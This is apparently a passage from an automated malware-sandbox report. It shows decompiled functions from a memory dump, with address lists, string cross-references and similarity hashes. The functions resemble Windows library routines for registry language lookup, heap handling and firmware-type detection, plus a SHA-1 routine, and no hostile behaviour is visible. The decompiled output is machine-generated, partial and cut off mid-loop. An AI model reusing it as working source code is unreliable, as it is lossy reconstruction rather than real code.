							L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0305FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0305BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E03059600();
					if(_t97 < 0) {
						goto L6;
					}
					E0305BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L0301F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0305BB40(_t83, _t102 + 0x24, _t78);
								if(L030243C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0305BB40(_t84, _t102 + 0x24, _t94);
									if(L030243C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x0301e620
0x0301e628
0x0301e62f
0x0301e631
0x0301e635
0x0301e637
0x0301e63e
0x03075503
0x03075503
0x0301e64c
0x0301e64c
0x0301e651
0x00000000
0x00000000
0x0301e661
0x0301e665
0x0307542a
0x0301e715
0x0301e71a
0x0301e71c
0x0301e720
0x0301e720
0x0301e727
0x0301e736
0x0301e736
0x0301e743
0x0301e743
0x0301e673
0x0301e678
0x0301e67d
0x0301e682
0x0301e685
0x0301e692
0x0301e69b
0x0301e6a3
0x0301e6ad
0x0301e6b1
0x0301e6b2
0x0301e6bb
0x0301e6bf
0x0301e6c0
0x0301e6c8
0x0301e6cc
0x0301e6d5
0x0301e6d9
0x00000000
0x00000000
0x0301e6e5
0x0301e6ea
0x0301e6f9
0x0301e70b
0x0301e70f
0x03075439
0x0307545e
0x0307545e
0x00000000
0x0307545e
0x0307543b
0x0307543e
0x03075440
0x03075445
0x03075472
0x03075475
0x0307548d
0x03075493
0x030754a9
0x00000000
0x00000000
0x030754ab
0x030754b4
0x030754bc
0x030754c8
0x030754de
0x030754fb
0x030754e0
0x030754e6
0x030754eb
0x030754eb
0x030754de
0x00000000
0x030754bc
0x03075477
0x0307547a
0x03075480
0x03075483
0x03075486
0x0307548b
0x00000000
0x00000000
0x00000000
0x0307548b
0x00000000
0x00000000
0x00000000
0x00000000
0x03075447
0x03075447
0x03075447
0x03075447
0x0307544e
0x00000000
0x00000000
0x03075450
0x03075452
0x03075455
0x0307545a
0x00000000
0x00000000
0x00000000
0x0307545c
0x0307546a
0x0307546d
0x0307546f
0x00000000
0x0307546f
0x0301e70f

Strings

@, xrefs: 0301E6C0
InstallLanguageFallback, xrefs: 0301E6DB
\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0301E68C

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: e771a017feffa2ea322338010f8642bfcfe9a28ab104f04662e9d6e8ced5259d
Instruction ID: 540b2886fd1fd0e834b4ce90e14f4344bce58dd1f852fb9db687ccb515449aeb
Opcode Fuzzy Hash: e771a017feffa2ea322338010f8642bfcfe9a28ab104f04662e9d6e8ced5259d
Instruction Fuzzy Hash: E251D37690A3459BD750DF25C840AAFB3E8BF89714F08096EF985EB240FB74D904C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 030DE539, Relevance: 2.8, Strings: 2, Instructions: 261
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E030DE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E030DBBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E030DBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E030DAFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E03059730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E030DA80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E030DA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E03059730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E030DA80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E030DA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E03032280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E0302B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E0302FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E03037D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E030CFEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}

0x030de547
0x030de549
0x030de54f
0x030de553
0x030de557
0x030de55a
0x030de55c
0x030de55f
0x030de561
0x030de567
0x030de56b
0x030de7e2
0x00000000
0x030de571
0x030de575
0x030de577
0x030de57b
0x030de57c
0x030de57d
0x030de57e
0x030de57f
0x030de588
0x030de58f
0x030de591
0x030de592
0x030de592
0x030de596
0x030de59e
0x030de5a0
0x030de5a6
0x030de61d
0x030de61d
0x030de621
0x030de623
0x030de630
0x030de630
0x030de7e6
0x030de7eb
0x030de7ed
0x030de7f4
0x030de7fa
0x030de7ff
0x030de7ff
0x030de80a
0x030de812
0x030de812
0x030de5ab
0x030de5b4
0x030de5b9
0x030de5be
0x030de5c0
0x030de5c2
0x030de5c8
0x030de5c9
0x030de5cb
0x030de5cc
0x030de5d5
0x030de5e4
0x030de5f1
0x030de5f8
0x030de5f8
0x030de5d5
0x030de602
0x030de616
0x030de63d
0x030de644
0x030de64d
0x030de652
0x030de657
0x030de659
0x030de65b
0x030de661
0x030de662
0x030de664
0x030de665
0x030de66e
0x030de67d
0x030de68a
0x030de691
0x030de691
0x030de66e
0x030de6b0
0x00000000
0x030de6b6
0x030de6bd
0x030de6c7
0x030de6d7
0x030de6d9
0x030de6db
0x030de6de
0x030de6e3
0x030de6f3
0x030de6fc
0x030de700
0x030de700
0x030de704
0x030de70a
0x030de70a
0x030de713
0x030de716
0x030de719
0x030de720
0x030de761
0x030de76b
0x030de774
0x030de77a
0x030de77a
0x030de78a
0x030de791
0x030de799
0x030de79b
0x030de79f
0x030de7aa
0x030de7c0
0x030de7ac
0x030de7b2
0x030de7b9
0x030de7b9
0x030de7c7
0x030de806
0x00000000
0x030de7c9
0x030de7d1
0x030de7d8
0x00000000
0x030de7d8
0x00000000
0x00000000
0x030de722
0x030de72e
0x030de748
0x030de74c
0x030de754
0x030de756
0x030de75c
0x030de75c
0x00000000
0x030de75c
0x030de758
0x030de758
0x00000000
0x030de758
0x030de750
0x00000000
0x00000000
0x030de752
0x00000000
0x030de752
0x030de730
0x030de735
0x030de73d
0x030de73f
0x00000000
0x00000000
0x030de741
0x030de741
0x00000000
0x030de741
0x030de739
0x00000000
0x00000000
0x030de73b
0x00000000
0x030de73b
0x030de722
0x030de720
0x030de6b0
0x030de618
0x00000000
0x030de618

Strings

`, xrefs: 030DE5D7
`, xrefs: 030DE670

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction ID: 00395e5dae40db7e4600d02c1e20bba3128b021710bc39a61e45ab8febb21733
Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction Fuzzy Hash: E791AC316053429BE7A4CE25C840B6BB7E6BFC4754F18892DF999CF280E774E904CB52

Uniqueness

Uniqueness Score: -1.00%

Function 030951BE, Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E030951BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x30f05f0);
				E0306D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E0302EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E030953CA(0);
						return E0306D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0305F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E03033690(1, _t117, 0x2ff1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0305AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L03034620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0305AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0309500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E03059860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x030951be
0x030951c3
0x030951c8
0x030951cd
0x030951d0
0x030951d3
0x030951d8
0x030951db
0x030951de
0x030951e0
0x030951e3
0x030951e6
0x030951e8
0x03095342
0x03095351
0x03095356
0x0309535a
0x03095360
0x03095363
0x03095366
0x03095369
0x03095369
0x0309536b
0x0309536b
0x03095370
0x030953a3
0x030953a4
0x030953a6
0x030953ab
0x030953ab
0x030953ae
0x030953ae
0x030953b5
0x030953bf
0x030953bf
0x03095375
0x03095396
0x030953a0
0x030953a0
0x00000000
0x03095396
0x03095377
0x03095379
0x0309537f
0x0309538c
0x03095390
0x00000000
0x03095390
0x030951ee
0x030951f1
0x03095301
0x03095310
0x03095315
0x03095318
0x0309531b
0x03095320
0x0309532e
0x03095331
0x00000000
0x03095331
0x03095328
0x03095329
0x00000000
0x03095329
0x030951fa
0x03095235
0x03095236
0x03095239
0x0309523f
0x03095240
0x03095241
0x03095242
0x03095246
0x03095247
0x0309524e
0x03095251
0x03095267
0x03095269
0x0309526e
0x0309527d
0x0309527e
0x03095281
0x03095282
0x03095287
0x03095288
0x0309528a
0x0309528f
0x03095294
0x00000000
0x00000000
0x0309529a
0x0309529c
0x0309529e
0x0309529e
0x030952a4
0x030952b0
0x00000000
0x00000000
0x030952ba
0x030952bc
0x030952bc
0x030952d4
0x030952d9
0x030952dc
0x030952e1
0x00000000
0x00000000
0x030952e7
0x030952f4
0x00000000
0x030952f4
0x03095270
0x00000000
0x03095270
0x030951fc
0x030951fd
0x03095202
0x03095203
0x03095205
0x0309520a
0x0309520f
0x00000000
0x00000000
0x0309521b
0x03095226
0x0309522b
0x0309521d
0x0309521d
0x03095222
0x03095222
0x0309522d
0x00000000

Strings

Legacy, xrefs: 03095226
UEFI, xrefs: 0309521D

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 432c83fe8caadb3c2388e43d11cba88c358bf28965d789dced139cb7f0635ec0
Instruction ID: 82801901763e0eb929fc20ef2ddccce5f3b397e72806aac398fe8cf933a3e144
Opcode Fuzzy Hash: 432c83fe8caadb3c2388e43d11cba88c358bf28965d789dced139cb7f0635ec0
Instruction Fuzzy Hash: 9C517B71A027089FEF25DFA9CC40AAEBBF8BF49700F14842EE649EB251D6719900DB14

Uniqueness

Uniqueness Score: -1.00%

Function 00408C2C, Relevance: 1.7, Strings: 1, Instructions: 424
COMMONCrypto

Download Yara Rule

C-Code - Quality: 73%

			E00408C2C(void* __eax, void* __edx, signed int* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v117;
				char _v304;
				signed char* _t282;
				signed int* _t283;
				signed int _t284;
				signed int _t290;
				signed int _t293;
				signed int _t297;
				signed int _t300;
				signed int _t304;
				signed int _t308;
				signed int _t310;
				signed int _t316;
				signed int _t324;
				signed int _t326;
				signed int _t329;
				signed int _t331;
				signed int _t340;
				signed int _t346;
				signed int _t347;
				signed int _t352;
				signed int _t360;
				signed int _t364;
				signed int _t365;
				signed int _t369;
				signed int _t372;
				signed int _t376;
				signed int _t377;
				signed int _t407;
				signed int _t412;
				signed int _t418;
				signed int _t421;
				signed int _t428;
				signed int _t431;
				signed int _t440;
				signed int _t442;
				signed int _t445;
				signed int _t453;
				signed int _t468;
				signed int _t471;
				signed int _t472;
				signed int _t473;
				signed int _t479;
				signed int _t487;
				signed int _t488;
				signed int* _t489;
				signed int* _t492;
				signed int _t499;
				signed int _t502;
				signed int _t507;
				signed int _t510;
				signed int _t513;
				signed int _t516;
				signed int _t517;
				signed int _t521;
				signed int _t533;
				signed int _t536;
				signed int _t543;
				void* _t549;
				void* _t551;

				_v117 = _v117 - __edx;
				_t549 = _t551;
				_t492 = _a4;
				_t360 = 0;
				_t5 =  &(_t492[7]); // 0x1b
				_t282 = _t5;
				do {
					 *(_t549 + _t360 * 4 - 0x14c) = ((( *(_t282 - 1) & 0x000000ff) << 0x00000008 |  *_t282 & 0x000000ff) << 0x00000008 | _t282[1] & 0x000000ff) << 0x00000008 | _t282[2] & 0x000000ff;
					 *(_t549 + _t360 * 4 - 0x148) = (((_t282[3] & 0x000000ff) << 0x00000008 | _t282[4] & 0x000000ff) << 0x00000008 | _t282[5] & 0x000000ff) << 0x00000008 | _t282[6] & 0x000000ff;
					 *(_t549 + _t360 * 4 - 0x144) = (((_t282[7] & 0x000000ff) << 0x00000008 | _t282[8] & 0x000000ff) << 0x00000008 | _t282[9] & 0x000000ff) << 0x00000008 | _t282[0xa] & 0x000000ff;
					 *(_t549 + _t360 * 4 - 0x140) = (((_t282[0xb] & 0x000000ff) << 0x00000008 | _t282[0xc] & 0x000000ff) << 0x00000008 | _t282[0xd] & 0x000000ff) << 0x00000008 | _t282[0xe] & 0x000000ff;
					_t360 = _t360 + 4;
					_t282 =  &(_t282[0x10]);
				} while (_t360 < 0x10);
				_t283 =  &_v304;
				_v8 = 0x10;
				do {
					_t407 =  *(_t283 - 0x18);
					_t468 =  *(_t283 - 0x14);
					_t364 =  *(_t283 - 0x20) ^ _t283[5] ^  *_t283 ^ _t407;
					asm("rol ecx, 1");
					asm("rol ebx, 1");
					_t283[9] =  *(_t283 - 0x1c) ^ _t283[6] ^ _t283[1] ^ _t468;
					_t283[8] = _t364;
					_t324 = _t283[7] ^  *(_t283 - 0x10) ^ _t283[2];
					_t283 =  &(_t283[4]);
					asm("rol ebx, 1");
					asm("rol edx, 1");
					_t49 =  &_v8;
					 *_t49 = _v8 - 1;
					_t283[6] = _t324 ^ _t407;
					_t283[7] =  *(_t283 - 0x1c) ^  *(_t283 - 4) ^ _t364 ^ _t468;
				} while ( *_t49 != 0);
				_t326 =  *_t492;
				_t284 = _t492[1];
				_t365 = _t492[2];
				_t412 = _t492[3];
				_v12 = _t326;
				_v16 = _t492[4];
				_v8 = 0;
				do {
					asm("rol ebx, 0x5");
					_t471 = _v8;
					_t499 = _t326 + ( !_t284 & _t412 | _t365 & _t284) +  *((intOrPtr*)(_t549 + _t471 * 4 - 0x14c)) + _v16 + 0x5a827999;
					_t329 = _v12;
					asm("ror eax, 0x2");
					_v16 = _t412;
					_v12 = _t499;
					asm("rol esi, 0x5");
					_v8 = _t365;
					_t418 = _t499 + ( !_t329 & _t365 | _t284 & _t329) +  *((intOrPtr*)(_t549 + _t471 * 4 - 0x148)) + _v16 + 0x5a827999;
					_t502 = _t284;
					asm("ror ebx, 0x2");
					_v16 = _v8;
					_t369 = _v12;
					_v8 = _t329;
					_t331 = _v8;
					_v12 = _t418;
					asm("rol edx, 0x5");
					_t290 = _t418 + ( !_t369 & _t502 | _t329 & _t369) +  *((intOrPtr*)(_t549 + _t471 * 4 - 0x144)) + _v16 + 0x5a827999;
					_t421 = _v12;
					_v16 = _t502;
					asm("ror ecx, 0x2");
					_v8 = _t369;
					_v12 = _t290;
					asm("rol eax, 0x5");
					_v16 = _t331;
					_t507 = _t290 + ( !_t421 & _t331 | _t369 & _t421) +  *((intOrPtr*)(_t549 + _t471 * 4 - 0x140)) + _v16 + 0x5a827999;
					_t365 = _v12;
					_t293 = _v8;
					asm("ror edx, 0x2");
					_v8 = _t421;
					_v12 = _t507;
					asm("rol esi, 0x5");
					_v16 = _t293;
					_t284 = _v12;
					_t510 = _t507 + ( !_t365 & _t293 | _t421 & _t365) +  *((intOrPtr*)(_t549 + _t471 * 4 - 0x13c)) + _v16 + 0x5a827999;
					_t412 = _v8;
					asm("ror ecx, 0x2");
					_t472 = _t471 + 5;
					_t326 = _t510;
					_v12 = _t326;
					_v8 = _t472;
				} while (_t472 < 0x14);
				_t473 = 0x14;
				do {
					asm("rol esi, 0x5");
					asm("ror eax, 0x2");
					_v16 = _t412;
					_t513 = _t510 + (_t412 ^ _t365 ^ _t284) +  *((intOrPtr*)(_t549 + _t473 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
					_t340 = _v12;
					_v12 = _t513;
					asm("rol esi, 0x5");
					_t428 = _t513 + (_t365 ^ _t284 ^ _t340) +  *((intOrPtr*)(_t549 + _t473 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
					asm("ror ebx, 0x2");
					_t516 = _t284;
					_v16 = _t365;
					_t372 = _v12;
					_v12 = _t428;
					asm("rol edx, 0x5");
					asm("ror ecx, 0x2");
					_t297 = _t428 + (_t284 ^ _t340 ^ _t372) +  *((intOrPtr*)(_t549 + _t473 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
					_t431 = _v12;
					_v8 = _t340;
					_v8 = _t372;
					_v12 = _t297;
					asm("rol eax, 0x5");
					_t473 = _t473 + 5;
					_t365 = _v12;
					asm("ror edx, 0x2");
					_t149 = _t516 + 0x6ed9eba1; // 0x6ed9eb9f
					_t517 = _t297 + (_t340 ^ _v8 ^ _t431) +  *((intOrPtr*)(_t549 + _t473 * 4 - 0x154)) + _t149;
					_t300 = _v8;
					_v8 = _t431;
					_v12 = _t517;
					asm("rol esi, 0x5");
					_t412 = _v8;
					_t510 = _t517 + (_t300 ^ _v8 ^ _t365) +  *((intOrPtr*)(_t549 + _t473 * 4 - 0x150)) + _t340 + 0x6ed9eba1;
					_v16 = _t300;
					_t284 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t510;
				} while (_t473 < 0x28);
				_v8 = 0x28;
				do {
					asm("rol esi, 0x5");
					_v16 = _t412;
					asm("ror eax, 0x2");
					_t521 = ((_t365 | _t284) & _t412 | _t365 & _t284) +  *((intOrPtr*)(_t549 + _v8 * 4 - 0x14c)) + _t510 + _v16 - 0x70e44324;
					_t479 = _v12;
					_v12 = _t521;
					asm("rol esi, 0x5");
					_t346 = _v8;
					asm("ror edi, 0x2");
					_t440 = ((_t284 | _t479) & _t365 | _t284 & _t479) +  *((intOrPtr*)(_t549 + _t346 * 4 - 0x148)) + _t521 + _v16 - 0x70e44324;
					_v16 = _t365;
					_t376 = _v12;
					_v12 = _t440;
					asm("rol edx, 0x5");
					_v8 = _t284;
					_t442 = ((_t479 | _t376) & _t284 | _t479 & _t376) +  *((intOrPtr*)(_t549 + _t346 * 4 - 0x144)) + _t440 + _v16 - 0x70e44324;
					asm("ror ecx, 0x2");
					_v16 = _v8;
					_t304 = _v12;
					_v8 = _t479;
					_v12 = _t442;
					asm("rol edx, 0x5");
					asm("ror eax, 0x2");
					_t533 = ((_t376 | _t304) & _t479 | _t376 & _t304) +  *((intOrPtr*)(_t549 + _t346 * 4 - 0x140)) + _t442 + _v16 - 0x70e44324;
					_v16 = _v8;
					_t445 = _t376;
					_t365 = _v12;
					_v8 = _t445;
					_v12 = _t533;
					asm("rol esi, 0x5");
					_v16 = _v8;
					_t510 = ((_t304 | _t365) & _t445 | _t304 & _t365) +  *((intOrPtr*)(_t549 + _t346 * 4 - 0x13c)) + _t533 + _v16 - 0x70e44324;
					_t412 = _t304;
					_t284 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t510;
					_t347 = _t346 + 5;
					_v8 = _t347;
				} while (_t347 < 0x3c);
				_t487 = 0x3c;
				_v8 = 0x3c;
				do {
					asm("rol esi, 0x5");
					_t488 = _v8;
					asm("ror eax, 0x2");
					_t536 = (_t412 ^ _t365 ^ _t284) +  *((intOrPtr*)(_t549 + _t487 * 4 - 0x14c)) + _t510 + _v16 - 0x359d3e2a;
					_t352 = _v12;
					_v16 = _t412;
					_v12 = _t536;
					asm("rol esi, 0x5");
					asm("ror ebx, 0x2");
